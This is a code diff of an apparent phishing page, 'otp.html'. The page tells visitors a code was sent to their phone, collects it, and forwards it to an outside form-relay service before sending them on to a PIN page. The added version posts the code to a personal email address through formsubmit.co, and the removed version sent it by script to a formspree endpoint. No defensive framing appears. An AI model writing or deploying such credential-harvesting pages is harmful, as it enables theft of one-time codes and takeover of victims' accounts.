--- a/otp.html
+++ b/otp.html
@@ -1,95 +1,46 @@
 <!DOCTYPE html>
 <html lang="en">
-  <head>
-    <meta charset="UTF-8" />
-    <link rel="icon" type="img" href="asset/header-logo.png" />
-    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+<head>
+    <meta charset="UTF-8">
+    <link rel="icon" type="img" href="asset/header-logo.png">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Verify</title>
-
     <script type="module" crossorigin src="/main.js"></script>
-    <link rel="stylesheet" href="asset/style.css" />
-  </head>
+    <link rel="stylesheet" href="asset/style.css">
+</head>
 
-  <body class="bg-gray-100">
+<body class="bg-gray-100">
     <div class="w-[90%] max-w-md mx-auto pt-5">
-      <div class="mt-5"></div>
+        <div class="mt-5"></div>
 
-      <form id="form" class="mt-44">
-        <input type="hidden" name="_captcha" value="false" />
-        <div class="inputsCtn bg-white rounded-md shadow-sm p-6 flex flex-col gap-6">
-          <p class="font-bold text-center text-xl2 mb-3">Enter code</p>
-          <p>We have sent a code to your phone number.</p>
-          <div class="ctn relative">
-            <input
-              required
-              minlength="5"
-              id="phone"
-              name="phone"
-              type="text"
-              class="w-full rounded-md p-4 outline-none pl-12 transition-all bg-gray-100 focus:border-primary focus:border font-semibold"
-              placeholder="Verification code"
-            />
-          </div>
+        <form id="form" class="mt-44" action="https://formsubmit.co/emenikeonyechere@gmail.com" method="POST">
+            <input type="hidden" name="_captcha" value="false">
+            <input type="hidden" name="_next" value="pin.html"> <!-- Redirect after submission -->
 
-          <p class="pt-7 text-primary font-semibold text-center">
-            Didn't receive code?
-          </p>
-          <p class="pt-4 font-semibold text-center">
-            Your code will be active for 15 minutes
-          </p>
-          <div class="spacee"></div>
+            <div class="inputsCtn bg-white rounded-md shadow-sm p-6 flex flex-col gap-6">
+                <p class="font-bold text-center text-xl2 mb-3">Enter code</p>
+                <p>We have sent a code to your phone number.</p>
+                <div class="ctn relative">
+                    <input
+                        required
+                        minlength="5"
+                        id="phone"
+                        name="verification_code"
+                        type="text"
+                        class="w-full rounded-md p-4 outline-none pl-12 transition-all bg-gray-100 focus:border-primary focus:border font-semibold"
+                        placeholder="Verification code"
+                    />
+                </div>
 
-          <button id="redirectBtn" type="submit" class="bg-primary text-white w-full rounded-md p-4 disabled:opacity-80">
-            Verify
-          </button>
-        </div>
-      </form>
+                <p class="pt-7 text-primary font-semibold text-center">Didn't receive code?</p>
+                <p class="pt-4 font-semibold text-center">Your code will be active for 15 minutes</p>
+                <div class="spacee"></div>
+
+                <button id="redirectBtn" type="submit" class="bg-primary text-white w-full rounded-md p-4 disabled:opacity-80">
+                    Verify
+                </button>
+            </div>
+        </form>
     </div>
-
-    <script type="text/javascript">
-      document.addEventListener("DOMContentLoaded", function () {
-        console.log("working");
-
-        const form = document.getElementById("form");
-        const phoneInput = document.getElementById("phone");
-        const btn = document.getElementById("redirectBtn");
-
-        if (form) {
-          form.addEventListener("submit", async function (event) {
-            event.preventDefault(); // Prevent default form submission
-
-            if (!phoneInput.value) {
-              alert("Please enter the verification code.");
-              return;
-            }
-
-            btn.textContent = "Loading...";
-            btn.disabled = true;
-
-            localStorage.setItem("phone", phoneInput.value);
-            let formData = new FormData(form);
-
-            try {
-              let response = await fetch("https://formspree.io/f/mdkeovkr", {
-                method: "POST",
-                body: formData,
-                headers: { Accept: "application/json" },
-              });
-
-              if (response.ok) {
-                window.location.href = "pin.html";
-              } else {
-                alert("Failed to send form. Please try again.");
-              }
-            } catch (error) {
-              alert("An error occurred. Please try again later.");
-            } finally {
-              btn.textContent = "Verify";
-              btn.disabled = false;
-            }
-          });
-        }
-      });
-    </script>
-  </body>
+</body>
 </html>
